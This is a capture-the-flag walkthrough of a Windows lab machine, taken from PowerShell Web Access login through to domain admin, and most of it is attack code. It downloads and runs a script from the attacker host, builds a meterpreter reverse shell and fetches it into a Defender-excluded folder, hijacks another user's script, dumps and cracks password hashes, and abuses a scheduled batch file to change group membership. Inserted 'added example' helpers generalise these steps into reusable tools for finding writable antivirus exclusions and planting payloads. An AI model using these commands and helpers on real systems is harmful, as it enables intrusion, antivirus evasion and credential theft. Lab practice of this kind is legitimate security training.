Basic information

Port scan

Only port 443 is open:

$ nmap -sC -sV 10.10.11.145
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-01 14:03 CST
Nmap scan report for 10.10.11.145
Host is up (0.088s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after: 2030-01-04T06:34:58
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
|_ssl-date: 2022-03-01T06:05:41+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.22 seconds

443

Browsing to the IP directly returns a 404; after adding a hosts entry for the name from the certificate, it serves a WordPress site:

10.10.11.145 atsserver.acute.local

atsserver.acute.local

The About Us page gives some usernames, and a document downloadable from the top right mentions the default password:

The document also mentions PSWA (PowerShell Web Access):

and gives the PSWA link:

PSWA

PSWA login needs a username, a password and a computer name. We already have the user list and the default password; the computer name can be taken from the document's EXIF metadata:

users.txt

Build a wordlist from the names on the website, using the username format seen in the document (first initial + surname):

edavies
chall
awallace
imonks
jmorgon
lhopkins
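To generate such a list without hand-typing it, the following helper (an added example, not part of the original writeup) takes full names and emits several common username formats, of which the first-initial + surname form matches what the document shows. The two names in `$names` are constructed placeholders, not the names from the site.

```powershell
# Added example: derive candidate usernames from full names in several formats.
# The writeup's document shows the "edavies" style (first initial + surname);
# the other formats are included so the same list can be reused against other targets.
function New-UsernameList {
    param([Parameter(Mandatory)][string[]]$FullName)
    $out = foreach ($name in $FullName) {
        $parts = $name.Trim().ToLower() -split '\s+'
        if ($parts.Count -lt 2) { continue }      # need at least a first and a last name
        $first = $parts[0]
        $last  = $parts[-1]
        "$($first[0])$($last)"       # edavies   (format used by the target)
        "$($first).$($last)"         # evan.davies
        "$($first)$($last)"          # evandavies
        "$($first[0]).$($last)"      # e.davies
        "$($first)$($last[0])"       # evand
    }
    $out | Sort-Object -Unique
}

# Constructed sample input; replace with the names scraped from the About Us page.
$names = @('Evan Davies', 'Charlotte Hall')
New-UsernameList -FullName $names | Set-Content -Path users.txt
Get-Content users.txt
```

Because the target's PSWA form also needs a computer name, the same list is what you feed into the login attempts together with the default password and the host name from the EXIF data.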

edavies

edavies
Password1!
Acute-Pc01

The edavies user never changed the default password, so we can log in to PSWA:

Lateral movement

It looks like we are inside a container or VM:

Port scan

Use PowerShell to port-scan the internal gateway from the container:

The scan takes a while:

# Load a TCP port-scan helper from the attacker's web server, then scan the gateway
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.8:7777/port-scan-tcp.ps1')
1..1024 | foreach { port-scan-tcp 172.16.22.1 $_ } > ports_open_gateway
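The downloaded script is not shown on the page, so here is a self-contained equivalent (an added example, not the writeup's port-scan-tcp.ps1) that can be pasted straight into the PSWA console. It uses an asynchronous connect with a per-port timeout, which is what keeps a scan of filtered ports from hanging; the gateway address and port range are the ones used above.

```powershell
# Added example: TCP connect scanner with a bounded timeout per port.
function Test-TcpPort {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][int]$Port,
        [int]$TimeoutMs = 500
    )
    $client = New-Object System.Net.Sockets.TcpClient
    try {
        $async = $client.BeginConnect($ComputerName, $Port, $null, $null)
        # Filtered ports never answer; waiting at most $TimeoutMs bounds the total scan time.
        if (-not $async.AsyncWaitHandle.WaitOne($TimeoutMs, $false)) { return $false }
        $client.EndConnect($async)   # throws if the port actively refused the connection
        return $true
    } catch {
        return $false
    } finally {
        $client.Close()
    }
}

function Invoke-PortScan {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [int[]]$Ports = (1..1024),
        [int]$TimeoutMs = 500
    )
    foreach ($p in $Ports) {
        if (Test-TcpPort -ComputerName $ComputerName -Port $p -TimeoutMs $TimeoutMs) {
            [pscustomobject]@{ Host = $ComputerName; Port = $p; State = 'open' }
        }
    }
}

# Usage inside the PSWA session: 172.16.22.1 is the gateway seen from the container.
Invoke-PortScan -ComputerName 172.16.22.1 -Ports (1..1024) -TimeoutMs 300 |
    Tee-Object -FilePath ports_open_gateway
```

Lowering the timeout speeds the scan up considerably on a LAN, but on a filtered network a value that is too small will miss slow-responding ports, so check the gateway's known-open ports (for example the one PSWA itself runs on) first to calibrate it.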

bypass defender

The host is running Defender, but it has exclusion paths configured. An exe uploaded into an excluded directory is not scanned and can be executed from there:

# On the target: list Defender's excluded paths (each exclusion is a value name under this key)
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"

# On the attacker: build a reverse-shell stager and serve it over HTTP
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f exe -o msf.exe

# On the target, from inside the excluded directory: fetch and then run it
curl http://10.10.14.8:7777/msf.exe -o msf.exe
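An exclusion only helps if the directory also exists and is writable by the current user, so the following helper (an added example, not from the writeup) merges the registry listing with the output of Get-MpPreference and probes each path by creating and deleting a temporary file. It assumes the registry key is readable by the current user, as it was here; Get-MpPreference is optional and is skipped if it fails.

```powershell
# Added example: enumerate Defender path exclusions and check which ones we can write to.
function Get-WritableDefenderExclusion {
    $paths = @()
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths'
    if (Test-Path $key) {
        # Each excluded path is stored as a value *name* under the key (the data is a DWORD 0).
        $paths += (Get-Item $key).GetValueNames()
    }
    # The Defender cmdlet reports the same list; ignore it if the module or permission is missing.
    try { $paths += (Get-MpPreference -ErrorAction Stop).ExclusionPath } catch { }

    foreach ($p in ($paths | Where-Object { $_ } | Sort-Object -Unique)) {
        $exists   = Test-Path -LiteralPath $p -PathType Container
        $writable = $false
        if ($exists) {
            # Create and immediately delete a probe file; success means a payload can be dropped here.
            $probe = Join-Path $p ([System.IO.Path]::GetRandomFileName())
            try {
                [System.IO.File]::WriteAllText($probe, '')
                Remove-Item -LiteralPath $probe -Force
                $writable = $true
            } catch {
                $writable = $false
            }
        }
        [pscustomobject]@{ Path = $p; Exists = $exists; Writable = $writable }
    }
}

Get-WritableDefenderExclusion | Format-Table -AutoSize
```

Exclusions can also be set per process or per extension (the sibling `Processes` and `Extensions` keys); the same write-probe logic applies to whatever directory such a process or file lives in.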

screenshare

Watching the desktop from the session we already have shows PowerShell being run periodically; the command line reveals a computer name, username and password:

meterpreter > screenshare -q 100

# Captured from the screen: a credential being used for a constrained remoting endpoint on ATSSERVER
$pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlaintext -Force
$cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $pass)
Enter-PSSession -computername ATSSERVER -ConfigurationName dc_manage -credential $cred

ATSSERVER

Reusing the captured commands directly in PSWA does not work as-is: Enter-PSSession cannot be nested inside the remote session PSWA already gives us. Invoke-Command, however, can still run commands on the target host through the same dc_manage session configuration:

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {whoami}

user flag

This gives us a user on the outer host, where we can read user.txt:

jmorgan && ACUTE-PC01 system

wm.ps1 on imonks's desktop contains information about the jmorgan user, who uses it to perform some operations against Acute-PC01, i.e. the container:

We can modify its contents so that, when it is run, it executes our msf.exe inside the container as jmorgan:

# Replace the Get-Volume call with our payload, check the result, then run the script
Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -ScriptBlock{((cat "c:\users\imonks\Desktop\wm.ps1" -Raw) -replace 'Get-Volume','cmd.exe /c c:\utils\msf.exe') | set-content -path c:\users\imonks\Desktop\wm.ps1}
Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -ScriptBlock{cat c:\users\imonks\Desktop\wm.ps1}
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock{C:\Users\imonks\Desktop\wm.ps1}
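The one-liners above overwrite wm.ps1 without keeping a copy. The following version (an added example, not the writeup's own commands) wraps the dc_manage endpoint in a small helper, refuses to write if the marker is not found, keeps the original contents on our side and restores them after the payload has run. It relies only on Get-Content and Set-Content, which the constrained endpoint is already known to allow; the paths, account and payload location are the ones used in the steps above.

```powershell
# Added example: hijack a script another user runs, with a verified replace and a restore step.
$pass = ConvertTo-SecureString 'W3_4R3_th3_f0rce.' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('acute\imonks', $pass)

function Invoke-Ats {
    # Run a script block on ATSSERVER through the dc_manage session configuration.
    param([Parameter(Mandatory)][scriptblock]$ScriptBlock, [object[]]$ArgumentList)
    $params = @{
        ComputerName      = 'ATSSERVER'
        ConfigurationName = 'dc_manage'
        Credential        = $cred
        ScriptBlock       = $ScriptBlock
    }
    if ($ArgumentList) { $params.ArgumentList = $ArgumentList }
    Invoke-Command @params
}

function Set-ScriptPayload {
    # Replace $Marker in the remote file with $Payload; returns the original text so it can be restored.
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string]$Marker,
        [Parameter(Mandatory)][string]$Payload
    )
    $original = Invoke-Ats -ArgumentList $Path -ScriptBlock { param($p) Get-Content -Path $p -Raw }
    if ($original -notmatch [regex]::Escape($Marker)) {
        throw "marker '$Marker' not found in $Path; refusing to overwrite it"
    }
    $patched = $original -replace [regex]::Escape($Marker), $Payload
    Invoke-Ats -ArgumentList $Path, $patched -ScriptBlock { param($p, $c) Set-Content -Path $p -Value $c }
    return $original
}

function Restore-Script {
    param([Parameter(Mandatory)][string]$Path, [Parameter(Mandatory)][string]$Content)
    Invoke-Ats -ArgumentList $Path, $Content -ScriptBlock { param($p, $c) Set-Content -Path $p -Value $c }
}

# Usage: swap Get-Volume for the payload, trigger the script, then put the original back.
$wm = 'C:\Users\imonks\Desktop\wm.ps1'
$backup = Set-ScriptPayload -Path $wm -Marker 'Get-Volume' -Payload 'cmd.exe /c C:\utils\msf.exe'
Invoke-Ats -ArgumentList $wm -ScriptBlock { param($p) Get-Content -Path $p }   # eyeball the patched script
Invoke-Ats -ScriptBlock { & 'C:\Users\imonks\Desktop\wm.ps1' }
Restore-Script -Path $wm -Content $backup
```

Set-Content appends a final newline, so the restored file may differ from the original by one trailing line break; that does not affect how PowerShell runs it.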

jmorgan is in the local Administrators group on ACUTE-PC01, so from that shell SYSTEM on the container follows directly:

hashdump && crack

Dump the local SAM hashes; one of the NT hashes cracks:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740:::

a29f7623fd11550def0192de9246f46b Password@123

AWallace

Enumeration on the host earlier showed that awallace is in the Managers group. Trying the cracked local Administrator password against that domain account shows it is reused:

$password = ConvertTo-SecureString "Password@123" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("Acute\AWallace",$password)
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -Command {whoami}

keepmeon

Listing Program Files reveals a keepmeon directory. Its batch script appears to be run by the lois user every 5 minutes, and the document from the website mentioned that lois has permission to change group membership:

Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -Command {ls 'c:\program files\keepmeon'}
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -Command {cat 'c:\program files\keepmeon\keepmeon.bat'}

site admin

So we can add the AWallace account we already control to the site_admin group: drop a new .bat into that directory and wait up to 5 minutes for keepmeon.bat to run it:

# Drop the batch file, confirm it is in place, then check our groups once the task has fired
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\admin.bat' -Value 'net group site_admin awallace /add /domain'}
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {ls 'c:\program files\Keepmeon\'}
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {cat 'c:\program files\Keepmeon\admin.bat'}

Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -Command {whoami /groups}
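Group membership only shows up in a fresh logon token, which is why a new Invoke-Command per check is needed rather than re-running whoami in the same session. The following helper (an added example, not the writeup's own commands) drops the batch file and then polls the dc_manage endpoint until the group appears or a timeout passes. It parses whoami's CSV output locally so the constrained endpoint only needs to run whoami itself; the path, credential and group name are the ones used above, and the poll interval and timeout are assumptions.

```powershell
# Added example: drop a .bat for the keepmeon task and wait for the resulting group change.
$password = ConvertTo-SecureString 'Password@123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('Acute\AWallace', $password)

function Wait-GroupMembership {
    param(
        [Parameter(Mandatory)][pscredential]$Credential,
        [Parameter(Mandatory)][string]$Group,
        [int]$TimeoutMinutes = 10,
        [int]$PollSeconds = 30
    )
    $deadline = (Get-Date).AddMinutes($TimeoutMinutes)
    while ((Get-Date) -lt $deadline) {
        # Each Invoke-Command is a new logon, so the token reflects current group membership.
        $csv = Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage `
            -Credential $Credential -ScriptBlock { whoami /groups /fo csv }
        $groups = $csv | ConvertFrom-Csv
        if ($groups | Where-Object { $_.'Group Name' -like "*\$Group" }) { return $true }
        Start-Sleep -Seconds $PollSeconds
    }
    return $false
}

$bat = 'C:\Program Files\Keepmeon\admin.bat'
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred `
    -ArgumentList $bat -ScriptBlock {
        param($Path)
        Set-Content -Path $Path -Value 'net group site_admin awallace /add /domain'
    }

if (Wait-GroupMembership -Credential $cred -Group 'site_admin') {
    "awallace is now in site_admin"
} else {
    "timed out waiting for keepmeon.bat to run $bat"
}
```

If the task runs every 5 minutes, a 10-minute timeout covers one missed cycle; if membership never appears, check that the .bat is still in the directory, since the task may delete files after running them.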

Once it has run we are not only in site_admin but have also automatically become a domain admin:

root flag

Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {ls 'c:\users\administrator\desktop'}
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {cat 'c:\users\administrator\desktop\root.txt'}
